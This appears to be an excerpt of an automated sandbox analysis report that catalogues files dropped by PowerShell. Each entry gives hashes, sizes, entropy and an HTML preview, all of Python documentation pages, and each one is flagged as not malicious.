                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="9. Classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/classes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Classes provide a means of bundling data and functionality together. Creating a new class creates a new type of object, allowing new instances of that type to be made. Each class instance can have ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Classes provide a means of bundling data and functionality together.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (544), with CRLF line terminators
                              Category:dropped
                              Size (bytes):135955
                              Entropy (8bit):4.788144996619546
                              Encrypted:false
                              SSDEEP:1536:MqyMwp7M05/Lb5Gqo4tByTDa4lE2xS+TKGoYCmLVFg6LsvytnpulhN0WkSb+vqBA:Vwp987uqsmueStSiwpKg
                              MD5:AEF48CCFF7BB9285EC2500EF9345880D
                              SHA1:5C9D9F7C76BE1889219554B2F29F04927CB2873C
                              SHA-256:10389AE331DCBD902FC1BFBA90A06355F8FD982469D8B1B7A4896F389D1BC2D1
                              SHA-512:473818687EDDEDD29B0524C85104FCA70C4F54CB312F5A46B92CBD2D2F6217E5C1D544259D085560CEE43CA432E890095648D061252D4B0E4B3568B315A3D584
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. More Control Flow Tools" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/controlflow.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="As well as the while statement just introduced, Python uses a few more that we will encounter in this chapter. if Statements: Perhaps the most well-known statement type is the if statement. For exa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="As well as the while statement just introduced, P
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
                              Category:dropped
                              Size (bytes):97972
                              Entropy (8bit):4.811273765505366
                              Encrypted:false
                              SSDEEP:1536:8qywMoHORvCNupfDnO4kGmn+Q3OSr4cOhjNMyF9yYbBNLCi0C2NMOk+fTsuFt+FY:5GAIWnoGOg
                              MD5:D9180331072BEDEE1B303D40B54AABE1
                              SHA1:37486D7BC5D99AA3CD985882DE091E23DE63E74E
                              SHA-256:6AA577294F0236A06EEB35E3B2D1B5D0DC7669FB4AE935669762EA92E0A45C9C
                              SHA-512:9F8535B7A9FCE5E9A0F2EA947147C21548ECFE28720199919F97837343F4983FE434F83FA8DA730DAE7E4BA604D02271D91796E97BD0D223165D7809666A3893
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. Data Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/datastructures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes some things you.ve learned about already in more detail, and adds some new things as well. More on Lists: The list data type has some more methods. Here are all of the method..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes some things you.ve learned
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (633), with CRLF, CR line terminators
                              Category:dropped
                              Size (bytes):80300
                              Entropy (8bit):4.827966433432982
                              Encrypted:false
                              SSDEEP:1536:jqy7MNljzzf662KEnp7mp3UHfOz9ig4QmB6SFhWtpKgJ2CknD84wcjMQn764N:SljnglGJ4B6aA27hV2g
                              MD5:34433F4522A26CCC97F68888751133F7
                              SHA1:029C6098DF35908931AF4A52C0E21489B32C81AB
                              SHA-256:C4FA9301FF7B08AE2A517122388E40D64AE8190681017DEDB3F27A47F780B262
                              SHA-512:C281BAC8D9CD94E15A101BF1746A7B19CFBD18323EBAC4DFB49B9E7E4C19F56A6AFFFA2D5D37B45B3CFB05469AE65BD72AFF0559250200BBF1DD745D81B235DD
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="8. Errors and Exceptions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/errors.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Until now error messages haven.t been more than mentioned, but if you have tried out the examples you have probably seen some. There are (at least) two distinguishable kinds of errors: syntax error..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Until now error messages haven.t been more than ment
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (814), with CRLF line terminators
                              Category:dropped
                              Size (bytes):43845
                              Entropy (8bit):4.949237808708209
                              Encrypted:false
                              SSDEEP:768:aqyH43MwmsQFssg6egHc5xRgSwn8uLtrB3rIn49/ULEDdZt1x5QkgV9bMRk764N:aqyaMwmsQFssgBgHcjeSy8uLtN3UQcLn
                              MD5:CF6F144D0540755DCF7538FF29EE97A0
                              SHA1:195D8F00214ACB3836B72F8293BA4A7258722133
                              SHA-256:0A2CF5D0420FF1DFF945EBAA3BED7395D02C2087704F8170ACCC3CC6D24942D6
                              SHA-512:2109154D63775DACA83BDF89BD649D37D78E831416CD37949E02AD79F18AB3D41CFAE75A9333D29C77713328EFF77540AAE6C7C0D29CDF5041B2680A44E779D5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="15. Floating Point Arithmetic: Issues and Limitations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/floatingpoint.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Floating-point numbers are represented in computer hardware as base 2 (binary) fractions. For example, the decimal fraction 0.625 has value 6/10 + 2/100 + 5/1000, and in the same way the binary fra..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Floating-point numb
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                              Category:dropped
                              Size (bytes):35042
                              Entropy (8bit):4.9086825218459245
                              Encrypted:false
                              SSDEEP:384:qHQHqklncqn5TMxHm7W/2hexAxaayRjEcIbBL3//IUtn0PuKRuntTMY76dqEC:qHEqynVtMxw38IbwcZMY764N
                              MD5:C3F1FEC9966E98DEA09CB57C29BF0D07
                              SHA1:29CB9DA6C0A3480E51899B3BF5E1BD2DDE2A9060
                              SHA-256:BDC3E89128C20C48F2CDA8B93374536D7007B154E455E3137F667908B45145C4
                              SHA-512:EA462B88F986470ABE79D183386D3A4F2E0BC42CA198D2371DF1D76DA4D76D2676317AE8BC28E7A14D318AF89541F56EF5E06D49E8613F37D20C15B77FDF864B
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Python Tutorial" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python is an easy to learn, powerful programming language. It has efficient high-level data structures and a simple but effective approach to object-oriented programming. Python.s elegant syntax an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python is an easy to learn, powerful programming language. I
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (696), with CRLF line terminators
                              Category:dropped
                              Size (bytes):74772
                              Entropy (8bit):4.877087174897302
                              Encrypted:false
                              SSDEEP:1536:jqyZfMHg8QVdcWttQ+0JCrBwqn1ZqmpeQBI8UI2To/9VrVWZyqmMd6MT764N:DIMv9/VRW8qmMdsg
                              MD5:1EDA147A54914694322B76E5B6ED64F0
                              SHA1:01B972B8465CC052DBFBF48E7F3C95E12AE1EA55
                              SHA-256:BCAD794FC3EE9F9B432F5830E1E383B5FB9D9DF37CC47FA9EED365D4E2655F08
                              SHA-512:66442C2496A1745C84516A2DEF8EE0CF03ADFC436F4684B27120FD6064CAB11AC7EF5339E9E8EEEF00304012DC9A8750407C4F146BFE3713CD501EB5192BD096
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="7. Input and Output" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/inputoutput.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are several ways to present the output of a program; data can be printed in a human-readable form, or written to a file for future use. This chapter will discuss some of the possibilities. Fa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are several ways to present the output of a progra
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17742
                              Entropy (8bit):4.848445653564974
                              Encrypted:false
                              SSDEEP:384:09+HqklR7Y+nNTMlbcX7danxTM/76dqEC:9qyR7L5MtcX701M/764N
                              MD5:1889403CC861246E419F5007B9871707
                              SHA1:3A366FC8AEB7ACC93655E6DA49DFFD84050EBC97
                              SHA-256:7734DB103140D23BDA28BA55A97FC2492E878C480A93EB625D3CE6EBE7C40E34
                              SHA-512:DB3FD103C445AF933AD45AA44F68BBDE005418A2BE23B73F31C8EBEC7A5ADA0BD790540B58FD75E2A3717CFA415F13A5F56A59BC5C3D3AA042B9D765D9C1C81D
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="14. Interactive Input Editing and History Substitution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/interactive.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Some versions of the Python interpreter support editing of the current input line and history substitution, similar to facilities found in the Korn shell and the GNU Bash shell. This is implemented..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Some versions of the
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (403), with CRLF line terminators
                              Category:dropped
                              Size (bytes):28382
                              Entropy (8bit):4.876080500233324
                              Encrypted:false
                              SSDEEP:384:J/1HqklA3VX7+9nwTM23NO487/H7HYsu9sOOYbaNOsdI3RnuIvzZ3VX77TnGTM9N:Hqy+5E+MKOFmadI3RnnR5XsMd764N
                              MD5:56E528B855A25D2D642BAD3BC4F410C2
                              SHA1:5D143A9D6B442B34EA08979258E3356BC4B3B0EA
                              SHA-256:F6188CEA7D630180B20C4FFF29B221CC44976F5C911F43BA2E93914B7B0B8CAC
                              SHA-512:1FF829D643D8B164F77C4858E6F4706C65328D0D7036B90E1E6C0739A4CA1ECAA169073AF86F4E4F3E666D7952D2253E7B2ABF68EF8194F2E98CA953B0A256BE
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Using the Python Interpreter" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/interpreter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Invoking the Interpreter: The Python interpreter is usually installed as/usr/local/bin/python3.12 on those machines where it is available; putting/usr/local/bin in your Unix shell.s search path mak..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Invoking the Interpreter: The Python inter
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (620), with CRLF line terminators
                              Category:dropped
                              Size (bytes):71636
                              Entropy (8bit):4.88804380245398
                              Encrypted:false
                              SSDEEP:1536:DqyCML0d0Akyg+peikgtJLqK72aaOVloVodYdx6u0oKxrPZRXXIx/VcVBiW9nS+9:30GA8PwFM/2cg
                              MD5:627CFB45B855B15C9D3F0D585E957856
                              SHA1:BF087C95836190A26B41F1485253F7BF6E00DF55
                              SHA-256:893D5E400AEF0AD8C56EF63D1E2BF7EB8DF17827C8DD96557FA355CF224A14DD
                              SHA-512:B565434A904C58633F0183DC4DD717FCD8E3ADE1E3AC6564BAA6B1332FE04B06F4A0B2936DE8A2D90C0F5D49E12CA2CA2E565AECF89C6363AA60FC94CC95943C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. An Informal Introduction to Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/introduction.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="In the following examples, input and output are distinguished by the presence or absence of prompts (>>> and .): to repeat the example, you must type everything after the prompt, when the prompt ap..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="In the following examples, input an
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (611), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72378
                              Entropy (8bit):4.966137398015963
                              Encrypted:false
                              SSDEEP:1536:rqyYMIfaN6a3+4DQFTY5Czj6vvLXLjfmPnac0L8jhsGWlvFMj764N:Ua0VXPvUg
                              MD5:804F0F2285FCD9E8793B41010DCCDC6A
                              SHA1:6C8D5006D19BD63ACCF9DD333C2F39C7AA0A5C3F
                              SHA-256:B7B7B89FEC9052277A46F73B717E28FF40EF3D5FAC78E903C911CFB2BB76A555
                              SHA-512:3714D04C86EC4DA96C37C550FF032E83036DD5FB10ABE6DF83BD76A07BE128B7E07EAA38A48BD52591E960253F15594327759213A9D21D05439479E5B15D90BE
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/modules.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="If you quit from the Python interpreter and enter it again, the definitions you have made (functions and variables) are lost. Therefore, if you want to write a somewhat longer program, you are bett..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="If you quit from the Python interpreter and enter it again, the defin
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1242), with CRLF line terminators
                              Category:dropped
                              Size (bytes):58199
                              Entropy (8bit):4.888347965554106
                              Encrypted:false
                              SSDEEP:1536:oqyYMNe3FMGot9jl+Sxu0tZjBOERomaUfuVMT764N:OPrFkBg
                              MD5:4C03289216E882F125E8A636376CB0EC
                              SHA1:24B19E98A4005A4FB040B91DB442FEE2DBF34E58
                              SHA-256:5AD425A47AA2CD1E9F11D8A6C9DBAA9AE3A0005DD1D5D69FB2764398A307AA00
                              SHA-512:00C9F521541FE9D4A1A3FCB2868C6B11D56FC8F1ED6A6232466F7E6BCE62351113D14C311D7E44788F60F3B1D478DC919AC36030F868623EB96B30A66C9781D9
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="10. Brief Tour of the Standard Library" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/stdlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Operating System Interface: The os module provides dozens of functions for interacting with the operating system: Be sure to use the import os style instead of from os import *. This will keep os.o..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Operating System Interface: The os module
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (652), with CRLF line terminators
                              Category:dropped
                              Size (bytes):66590
                              Entropy (8bit):4.859171275624418
                              Encrypted:false
                              SSDEEP:1536:YqywMl92x/d6PByDiAwmAw8vb0LKBn94FiuEM1764N:+yaoYg
                              MD5:1634193777BBF692BA6AA4213ADB9B4D
                              SHA1:8ECBBC7DF2DDF086A99A25ECE0DD85CAD005CDA9
                              SHA-256:3CDBF84049C84154F14AB3CD9598794CB7E00B4C90C2D27FBDE28658E1DA92DD
                              SHA-512:136ADB4C48A0B04E594606744B1B65711C8F8EAFEA61FCAB70B533AF5199DB5EEA85F1499AADD703A8FE75920A705928AE74B0B4A7BD708B68926D658936F58C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="11. Brief Tour of the Standard Library . Part II" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/stdlib2.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This second tour covers more advanced modules that support professional programming needs. These modules rarely occur in small scripts. Output Formatting: The reprlib module provides a version of r..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This second tour covers more
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (483), with CRLF line terminators
                              Category:dropped
                              Size (bytes):32793
                              Entropy (8bit):4.859616472253739
                              Encrypted:false
                              SSDEEP:768:qqydl9MceobNXQFDuESHBNA95Q4A87HJAlSAHKAMeO2a4AAX1QdPAxAuv5phmpM4:qqyZMRobNXODpSHBNA95dAwAYAqAMeO7
                              MD5:96C9CF058B1E462CD60A1568778DFD7B
                              SHA1:0FEB1B8B288F166ED242B8A991203AFB1CB45648
                              SHA-256:035F694B6AF89EA32551C604EB593930CF2A716188748F61314AA2139B68BD87
                              SHA-512:69076FA605F37AF92DC5B7E3F8D2F4B7488AB5415DDCC87D8D8ECCCCFA098A7182CCBE8CA610BCA7C534677C574ED70479A5684D99AFE88EB918B4084957F2F5
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="12. Virtual Environments and Packages" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/venv.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Introduction: Python applications will often use packages and modules that don.t come as part of the standard library. Applications will sometimes need a specific version of a library, because the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Introduction: Python applications will ofte
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):18091
                              Entropy (8bit):4.894304890647055
                              Encrypted:false
                              SSDEEP:384:mz5HqklbKVn9TMwwTzaHNU3iTIvpH7nhTMn76dqEC:iqybEpM5a8iapblMn764N
                              MD5:6B74018D1A21CA822B45FC16C18BD7F4
                              SHA1:E5609F4DDE13CF5B0E552CE1D4EFEBD560093C7B
                              SHA-256:B91CAD3BEAD98DDAC21DF4C397F271A56494C7F24B454F35C501A2D0C6B09BE2
                              SHA-512:5EEFE1127CBF38FEF62C2D6A37F78B2F273406204AA79D52AEF866A48DFB8B4C713D541D5B58954E1B8A3670EA47CAFEE639B6BB056590501881F7A41316EADC
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="13. What Now?" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/whatnow.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Reading this tutorial has probably reinforced your interest in using Python . you should be eager to apply Python to solving your real-world problems. Where should you go to learn more? This tutori..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Reading this tutorial has probably reinforced your interest in u
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (664), with CRLF line terminators
                              Category:dropped
                              Size (bytes):127905
                              Entropy (8bit):4.949790937428787
                              Encrypted:false
                              SSDEEP:1536:yqyJMH1rYB4bwqdSvXWC+ghavjrzOTH2IgHmAfFig8d/E1SjWWpM1W0AhejDa00B:R03vmitc5hM8nqOg
                              MD5:912A7905732ACAEA3BCA0D124E865544
                              SHA1:F171DCA98B2D818B238DA7F074950DB45253C4EC
                              SHA-256:6AD97EA7669DDA9F9B633F8D6F41C64DF5C1474D68FBD99F599B8D502D5DAAAE
                              SHA-512:24B90D9A2C4E8DF6E6ABEFDD4A0844C51000AE39CD2F8F8A2E188891937533A8D4C29B059E6F4F314749CA7C4E72C2D21BBE774969CB5932C298094A51B59E5A
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Command line and environment" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/cmdline.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The CPython interpreter scans the command line and the environment for various settings. CPython implementation detail: Other implementations. command line schemes may differ. See Alternate Impleme..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The CPython interpreter scans the command line an
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (511), with CRLF line terminators
                              Category:dropped
                              Size (bytes):121462
                              Entropy (8bit):4.978562868285762
                              Encrypted:false
                              SSDEEP:1536:wqyyyM6LzJ68Kz9eFlIdODWOmnMY8l9oUz4A5DwYaUtCpxzmKd6cYA4sryvQEP+q:ZvcIkI70u/Sexg
                              MD5:209A4D0ADB10A81C94B22B7FED155435
                              SHA1:06FA72A4BD7A153A0E93FBCEAAB4839163A06AE3
                              SHA-256:453C33E86BA2DD89DE4C46E4B518C53D23D78704580C3D32D5BA4D643051C991
                              SHA-512:7AA61DC921FD567D63B05B6343787A4D84F787BE205A54B72C863C25204E20B8CE595DC61C2CD9FA4128AC1B77B9F23B4208779EF0AA64B89D64E843E38E5D5F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. Configure Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/configure.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Build Requirements: Features required to build CPython: A C11 compiler. Optional C11 features are not required., Support for IEEE 754 floating point numbers and floating point Not-a-Number (NaN)., ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Build Requirements: Features required to build CPython: A C11
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):13640
                              Entropy (8bit):4.829913744622136
                              Encrypted:false
                              SSDEEP:192:W9Qdrt3KHqkX1v1MxAMgln1TMbEr7s/AMx+6rn5TMb5A76dqEC:oHqkl2Sln1TMb/tfrn5TMC76dqEC
                              MD5:E629F6D08B5CBF68711239116F2D153D
                              SHA1:0A3C4E73415C47F5AB1B316956F66B76B01F93DA
                              SHA-256:3D130F8FFF4AF93FB6F87212B0C4751DAA28C3487A21A09400BA2447D39995B7
                              SHA-512:11EE6AF6020A9F56F6637F0F17280021F1A6DE1CFB66479E8FBC09F41B3058BA3B5A9F254DE1D387C25EC402CF91A94F207E90895632D1D1E6BF26CD56CDE12C
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Editors and IDEs" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/editors.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are a number of IDEs that support Python programming language. Many editors and IDEs provide syntax highlighting, debugging tools, and PEP 8 checks. Please go to Python Editors and Integrated..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are a number of IDEs that support Python programming lang
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):25267
                              Entropy (8bit):4.9169090039341885
                              Encrypted:false
                              SSDEEP:384:xRTHqklYcanHTM6/Q0oYE1iSCg7R+njTMK76dqEC:vqyYjzMB0oY474XMK764N
                              MD5:91442B0CDB626AECD1FCA95CC7EA7299
                              SHA1:1EAE66DFB7809AA71B0E1CC494D9FE73734B113C
                              SHA-256:D321793916D42A4763E910D3B10533738EEDC1D7F7C68FC07FCB625ACE9D8DA3
                              SHA-512:F60BC7C4536645522993744A7CCBAD72F26D1A843DBF2DE0325308C156F9455839D986C05FE973D47A42F6430B3106EB7A3214426834B1E2BEF27FEA912BC47F
                              Malicious:false
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Setup and Usage" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/using/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This part of the documentation is devoted to general information on the setup of the Python environment on different platforms, the invocation of the interpreter and things that make working with P..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This part of the documentation is devoted to general informati
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):28440
                              Entropy (8bit):4.9449690982497705
                              Encrypted:false
                              SSDEEP:768:2eYYqygDGj3MobqoA73E+qnq6QXcUjRZzG0NDrjbMe764N:2ejqyrMobk3/ckG0lMe764N
                              MD5:8ED1D0E1A76EFFF7A0E40973E2CF62B2
                              SHA1:BC7CED2DED0E28635D72A51211FCF5C5DB44E01F
                              SHA-256:DE67924AC1D7329744E9E9E0ADCEFDC9E6A7B7DC9099706128BEE293E8B556A9
